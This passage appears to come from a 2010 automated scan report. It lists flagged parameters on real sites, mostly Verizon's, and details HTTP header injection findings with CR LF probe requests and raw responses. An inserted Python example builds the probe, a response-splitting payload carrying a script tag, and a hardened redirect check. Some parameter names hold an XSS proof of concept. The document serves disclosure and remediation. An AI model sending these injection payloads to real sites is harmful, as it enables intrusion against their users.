2.772. http://www.thestar.com/ScriptResource.axd [REST URL parameter 1]

2.773. http://www.thestar.com/WebResource.axd [REST URL parameter 1]

2.774. http://www.thestar.com/includes/headerweather [REST URL parameter 1]

2.775. http://www.thestar.com/includes/headerweather [REST URL parameter 2]

2.776. http://www.thestar.com/searchresults [REST URL parameter 1]

2.777. http://www.thestar.com/searchresults [q parameter]

2.778. http://www.thestar.com/searchresults [q parameter]

2.779. http://www.toronto.com/restaurants/listing/000-225-233/ [REST URL parameter 1]

2.780. http://www.toronto.com/searchResults [q parameter]

2.781. http://www.toronto.com/searchResults [q parameter]

2.782. http://www.truste.org/ivalidate.php [sealid parameter]

2.783. http://www.typepad.com/services/toolbar [autofollowed parameter]

2.784. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 1]

2.785. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 2]

2.786. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 3]

2.787. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 4]

2.788. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 5]

2.789. http://www.verizon.net/central/bookmark [WT.ti parameter]

2.790. http://www.verizon.net/central/bookmark [channel parameter]

2.791. http://www.verizon.net/central/bookmark [clientid parameter]

2.792. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]

2.793. http://www.verizon.net/central/bookmark [q parameter]

2.794. http://www.verizon.net/central/bookmark [web_search_type parameter]

2.795. https://www.verizon.net/ssowebapp/VOLPortalLogin [clientId parameter]

2.796. http://www.verizonwireless.com/b2c/store/controller [action parameter]

2.797. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]

2.798. http://www.verizonwireless.com/b2c/store/controller [item parameter]

2.799. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]

2.800. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]

2.801. http://www.walletpop.com/ [name of an arbitrarily supplied request parameter]

2.802. http://www.walletpop.com/blog/category/consumer-ally/ [REST URL parameter 3]

2.803. http://www.walletpop.com/blog/category/consumer-ally/ [REST URL parameter 3]

2.804. http://www.walletpop.com/blog/category/consumer-ally/ [name of an arbitrarily supplied request parameter]

2.805. http://www.walletpop.com/blog/category/consumer-ally/ [name of an arbitrarily supplied request parameter]

2.806. http://www.wltx.com/news/story.aspx [name of an arbitrarily supplied request parameter]

2.807. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [bgc parameter]

2.808. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [fc parameter]

2.809. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [width parameter]

2.810. http://www2.manheim.com/signup/step_one [language_selected parameter]

2.811. https://www2.manheim.com/login/forgot_password [language_selected parameter]

2.812. https://www2.manheim.com/login/forgot_username [language_selected parameter]

2.813. https://www2.manheim.com/signup/step_one [language_selected parameter]

2.814. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [branding parameter]

2.815. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [lang parameter]

2.816. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [makeTransition parameter]

2.817. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [name of an arbitrarily supplied request parameter]

2.818. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [referringSite parameter]

2.819. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.820. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.821. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

2.822. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter]

2.823. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

2.824. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [REST URL parameter 3]

2.825. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

2.826. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter]

2.827. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

2.828. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

2.829. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter]

2.830. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter]

2.831. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter]

2.832. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Account/MyAccountOverview.aspx [name of an arbitrarily supplied request parameter]

2.833. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]

2.834. https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx [ihaweb parameter]

2.835. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]

2.836. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter]

2.837. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter]

2.838. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

2.839. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

2.840. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [REST URL parameter 3]

2.841. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

2.842. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter]

2.843. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]

2.844. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]

2.845. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [ref parameter]

2.846. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]

2.847. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter]

2.848. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]

2.849. https://www22.verizon.com/myverizon/ [goto parameter]

2.850. https://www22.verizon.com/myverizon/ [goto parameter]

2.851. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [REST URL parameter 4]

2.852. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]

2.853. https://www36.verizon.com/FiOSVoice/members/CallsandMessages.aspx [REST URL parameter 2]

2.854. https://www36.verizon.com/FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx [REST URL parameter 2]

2.855. https://www36.verizon.com/FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx [REST URL parameter 2]

2.856. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [aspxerrorpath parameter]

2.857. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [aspxerrorpath parameter]

2.858. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [name of an arbitrarily supplied request parameter]

2.859. http://www.googleadservices.com/pagead/aclk [Referer HTTP header]

2.860. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]

2.861. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]

2.862. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]

2.863. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

2.864. http://surround.verizon.net/ [POPLocation cookie]

2.865. http://surround.verizon.net/ [POPLocation cookie]

2.866. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

2.867. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

2.868. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie]

2.869. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie]

2.870. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie]

2.871. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

2.872. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie]

2.873. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie]

2.874. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie]

2.875. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie]

2.876. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie]

2.877. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

2.878. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

2.879. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

2.880. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

2.881. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

2.882. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

2.883. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

2.884. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

2.885. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

2.886. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

2.887. http://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

2.888. http://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]

2.889. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

2.890. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

2.891. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

2.892. http://www22.verizon.com/Residential/FiOSTV/Plans/ [VzApps cookie]

2.893. http://www22.verizon.com/Residential/FiOSTV/Plans/ [dotcomsid cookie]

2.894. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [dotcomsid cookie]

2.895. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

2.896. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

2.897. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

2.898. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

2.899. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

2.900. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie]

2.901. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [vzpers cookie]

2.902. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

2.903. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

2.904. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

2.905. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

2.906. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

2.907. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

2.908. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

2.909. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

2.910. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

2.911. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

2.912. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

2.913. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

2.914. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

2.915. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/ [VzApps cookie]

2.916. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

2.917. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

2.918. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

2.919. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [vzpers cookie]

2.920. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [vzpers cookie]

2.921. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

2.922. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

2.923. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [VzApps cookie]

2.924. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

2.925. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

2.926. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

2.927. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

2.928. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

2.929. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

2.930. http://www22.verizon.com/Residential/Services/ [vzapps cookie]

2.931. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie]

2.932. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie]

2.933. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie]

2.934. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

2.935. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

2.936. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

2.937. http://www22.verizon.com/Residential/aboutFiOS/ [VzApps cookie]

2.938. http://www22.verizon.com/Residential/aboutFiOS/ [dotcomsid cookie]

2.939. http://www22.verizon.com/Residential/aboutFiOS/Features/ [VzApps cookie]

2.940. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

2.941. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]

2.942. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

2.943. http://www22.verizon.com/Residential/aboutFiOS/labs/ [VzApps cookie]

2.944. http://www22.verizon.com/Residential/aboutFiOS/labs/ [dotcomsid cookie]

2.945. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

2.946. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]

2.947. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

2.948. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

2.949. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]

2.950. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

2.951. http://www22.verizon.com/Residential/aboutFiOS/widgets/ [VzApps cookie]

2.952. http://www22.verizon.com/Residential/aboutFiOS/widgets/ [dotcomsid cookie]

2.953. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

2.954. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]

2.955. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

2.956. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

2.957. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

2.958. http://www22.verizon.com/residential/internet [vzapps cookie]

2.959. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie]

2.960. http://www22.verizon.com/residentialhelp [ECSPCookies cookie]

2.961. http://www22.verizon.com/residentialhelp [vzapps cookie]

2.962. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]

2.963. http://www22.verizon.com/residentialhelp/ [vzapps cookie]

2.964. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

2.965. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

2.966. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie]

2.967. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

2.968. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie]

2.969. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

2.970. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

2.971. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie]

2.972. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

2.973. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie]

2.974. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

2.975. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]

2.976. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

2.977. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie]

2.978. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie]

2.979. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

2.980. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie]

2.981. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

2.982. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie]

2.983. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

2.984. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

2.985. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]

2.986. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

2.987. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]

2.988. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

2.989. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]

2.990. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

2.991. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]

2.992. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie]

2.993. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzpers cookie]

2.994. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie]

2.995. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie]

2.996. https://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]

2.997. https://www22.verizon.com/residentialhelp/ [VzApps cookie]



1. HTTP header injection
There are 11 instances of this issue:

Issue background


HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can get carriage-return and line-feed characters (CR LF, sent URL-encoded as %0d%0a in the findings below) into the header value, they can terminate that header and append headers of their own, and, by injecting an empty line, break out of the header block into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request whose response body contains arbitrary JavaScript. Header injection can also sometimes be used to poison the cache of a proxy server through which users reach the application (HTTP response splitting): the attacker sends a crafted request whose response is "split" into two messages, the second of which carries arbitrary content. If the proxy can be made to associate that second response with another URL used within the application, the attacker has a "stored" attack against that URL which compromises every user who later requests it.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, the data should be strictly validated, after any URL-decoding the server performs and before it reaches the header-writing API, to prevent header injection. In most situations it is appropriate to allow only short alphanumeric strings to be copied into headers and to reject everything else. At a minimum, input containing any character with an ASCII code below 0x20 (which includes CR 0x0d and LF 0x0a) or the 0x7f DEL character should be rejected. For redirectors such as the Location sinks below, the target should additionally be checked against an allow-list of permitted hosts, since a value that is free of control characters can still send users to an arbitrary site.
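The following Python script is an added example and is not part of the scan report or of any Verizon, Kenshoo or tacoda code. It shows the three things a practitioner wants alongside the findings in this section: the CR LF probe the findings use and a checker that decides, from a raw response, whether the canary became a header line of its own (the confirmation the "Issue detail" entries rely on); the same sink turned into a full split response and parsed the way a naive proxy would parse it; and a hardened redirect builder that applies the remediation above. redirect_vulnerable and redirect_hardened are hypothetical stand-ins for the redirectors in findings 1.1-1.11, SAMPLE_1_1 is the finding 1.1 response trimmed to its relevant headers, and the allow-list host and evil.example are assumptions.

```python
"""Added example, not part of the report: CR LF probe, injection checker,
split-response parser and a hardened redirect builder. The redirect
functions are hypothetical stand-ins for the redirectors in findings
1.1-1.11; SAMPLE_1_1 is the finding 1.1 response trimmed to the relevant
headers; the allow-list host and evil.example are assumptions."""
import re
from urllib.parse import unquote, urlsplit

CANARY_A, CANARY_B = "914c0", "5ae8a0d6760"             # canaries from finding 1.1
TARGET = "http://www.perpetual.com.au/investors.aspx"   # redirect target in 1.1


def make_probe(prefix=CANARY_A, suffix=CANARY_B):
    """Burp-style payload: prefix, URL-encoded CR LF, suffix."""
    return f"{prefix}%0d%0a{suffix}"


def split_headers(raw):
    """(status line, header lines, body) of one raw HTTP/1.x response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    return lines[0], lines[1:], body


def injected_header_lines(raw, suffix=CANARY_B):
    """Header lines that *begin* with the canary suffix. A server only emits
    such a line if it wrote the payload's CR LF into the header block
    verbatim, which is exactly what the 'Issue detail' entries report."""
    _, headers, _ = split_headers(raw)
    return [h for h in headers if h.startswith(suffix)]


def parse_stream(raw):
    """Walk a byte stream as a naive proxy would, one message per
    Content-Length; returns [(status line, body), ...]."""
    msgs, pos = [], 0
    while pos < len(raw):
        status, headers, rest = split_headers(raw[pos:])
        if not status.startswith("HTTP/"):
            break                                       # trailing junk: stop
        clen = next((int(h.split(":", 1)[1]) for h in headers
                     if h.lower().startswith("content-length:")), 0)
        msgs.append((status, rest[:clen]))
        pos += (len(raw) - pos - len(rest)) + clen      # header block + body
    return msgs


def redirect_vulnerable(url):
    """The pattern behind the findings: the decoded parameter is copied
    into Location unchanged (hypothetical stand-in, not the real handler)."""
    return (f"HTTP/1.1 302 Found\r\nLocation: {url}\r\n"
            "Content-Length: 0\r\nConnection: close\r\n\r\n").encode("latin-1")


_CTL = re.compile(r"[\x00-\x1f\x7f]")


def redirect_hardened(url, allowed_hosts):
    """Check the raw string for control characters *before* parsing it
    (recent urlsplit silently strips CR/LF/tab, so checking afterwards
    would miss them), then allow-list the target host."""
    if _CTL.search(url):
        raise ValueError("control character in redirect target")
    p = urlsplit(url)
    if p.scheme not in ("http", "https") or p.hostname not in allowed_hosts:
        raise ValueError("redirect target not on allow-list")
    return (f"HTTP/1.1 302 Found\r\nLocation: {url}\r\n"
            "Content-Length: 0\r\nConnection: close\r\n\r\n").encode("latin-1")


def redirect_accepted(url, allowed_hosts):
    try:
        redirect_hardened(url, allowed_hosts)
        return True
    except ValueError:
        return False


# Finding 1.1 response, trimmed (constructed from the report's text).
SAMPLE_1_1 = (b"HTTP/1.1 302 Found\r\nServer: Apache/2.0.52 (Red Hat)\r\n"
              b"Location: http://www.perpetual.com.au/investors.aspx?914c0\r\n"
              b"5ae8a0d6760\r\n=1\r\nContent-Length: 0\r\n\r\n")


def demo_probe():
    """Replay 1.1 against the stand-in: the server URL-decodes the probe, the
    CR LF lands in the header block and the canary becomes its own line."""
    return injected_header_lines(redirect_vulnerable(TARGET + "?" + unquote(make_probe())))


def demo_split():
    """Same sink, full split: close the 302 early, then supply a complete
    second response whose body the attacker controls."""
    body = "<script>alert(1)</script>"
    payload = ("\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\n"
               f"Content-Type: text/html\r\nContent-Length: {len(body)}\r\n\r\n{body}")
    return parse_stream(redirect_vulnerable(TARGET + "?" + payload))


def demo_hardened(allowed=("www.perpetual.com.au",)):
    """(clean target accepted, CR LF probe rejected, off-list host rejected)."""
    return (redirect_accepted(TARGET + "?x=1", allowed),
            not redirect_accepted(TARGET + "?" + unquote(make_probe()), allowed),
            not redirect_accepted("http://evil.example/", allowed))
```

injected_header_lines is sink-agnostic: it works the same on the Set-Cookie sinks in 1.5, 1.8 and 1.9 as on the Location sinks, because it only asks whether the canary suffix started a header line. The order of checks in redirect_hardened matters: the control-character test runs on the raw string, since a URL parser that normalises away CR and LF would otherwise hide the very characters being rejected.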


1.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://50.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 914c0%0d%0a5ae8a0d6760 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&914c0%0d%0a5ae8a0d6760=1 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:31:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=0cb9eb0e-696a-22c8-5249-00007193de3f; expires=Fri, 18-Feb-2011 03:31:19 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx?914c0
5ae8a0d6760
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://50.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://50.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 4c016%0d%0a04bb2c362b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx4c016%0d%0a04bb2c362b6 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:31:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=555531e9-31c0-9dc9-aa49-0000346e4fb7; expires=Fri, 18-Feb-2011 03:31:16 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx4c016
04bb2c362b6

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://vulnerable.verizon.host/adi/N2870.vznbiz/B3160296 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N2870.vznbiz/B3160296

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 65bc6%0d%0a7e707f3a9da was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /65bc6%0d%0a7e707f3a9da/N2870.vznbiz/B3160296;sz=300x300;ord=2139185137? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
